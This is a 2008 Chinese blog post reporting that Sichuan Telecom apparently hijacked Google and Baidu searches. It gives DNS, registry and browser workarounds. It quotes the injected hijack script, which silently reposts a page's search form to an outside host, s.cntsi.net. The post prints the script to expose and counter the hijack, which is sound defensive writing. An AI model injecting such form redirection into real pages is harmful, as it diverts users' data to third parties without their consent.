关于近期四川电信对搜索的劫持与应对方法
2008-12-03 | 18:59从大约2008年11月30日起测试的结果来看,当访问google、baidu进行搜索的时候,遭到了HTTP的访问劫持并转向,准确的劫持页面是 125.64.31.13:81 这里,用 /b.js 来进行的劫持工作...
之后跳转到 s.cntsi.net 这里,利用 /earch.aspx 再次跳转到google,测试的时候发现由于可能还在矫正,目前即使是用百度搜索,也会被转到google的搜索结果上面去。
其中,b.js的内容如下
document.form.action = "http://S.cntsi.net/search.aspx";
document.form.method = "post";
document.form.submit();
解决的方法有大致三种:
1.使用 openDNS, www.opendns.com ;
2. 登录各自的网络页面进行搜索;
3.进行替换,将被劫持的域名修改为其他域名;
第1,2种方法没有什么好讲解的,我这里主要就是解释第三种,利用域名劫持的弊端是,域名一旦改变则劫持无效,所以将注册表中的搜索引擎里,google的域名换为 www.google.com.sg 新加坡的域名地址;baidu的域名换为 www.mamashuojiusuannizhucedeyumingzaichangbaidudounengsousuochulai.cn 这个超长的变态地址就可以了。
由于IE的版本不同,而且为了适应各个网页浏览器,现在我将最重要的搜索语句放出,各位根据自己需要手工修改吧。
google的 http://www.google.com.sg/search?hl=zh-CN&q={searchTerms}
baidu的 http://www.mamashuojiusuannizhucedeyumingzaichangbaidudounengsousuochulai.cn/s?wd={searchTerms}&ie=utf-8
在DNS Server上,我也进行了一定设置,介于电信确实相当低无耻,所以决定从OpenDNS上面转发一些域名,方法是在bind的配置文件named.conf中
Options
{
forwarders { 208.67.222.222; 208.67.220.220;};
}
顺带给出 Win下的DNS client相关命令
Windows下DNS cache相关命令
刷新DNS cache:
C:\>ipconfig /flushdns
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.
查看DNS cache:
C:\>ipconfig /displaydns
禁止DNS cache:
C:\>net stop dnscache
C:\>sc servername stop dnscache
也可以在控制面板->服务里关闭DNS client。
更改DNS cache时间:
修改注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters
MaxCacheTtl 最大DNS cache时间
MaxNegativeCacheTtl 最大失败DNS cache时间
相关日志
.text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://my.poco.cn/fav/storeIt.php?t='+escape(d.title)+'&u='+escape(d.location.href)+'&c='+escape(t)+'&img=http://www.h-strong.com/blog/logo.gif','keyit','scrollbars=no,width=475,height=575,status=no,resizable=yes'));keyit.focus(); "添加到POCO网摘"){kind=logo}
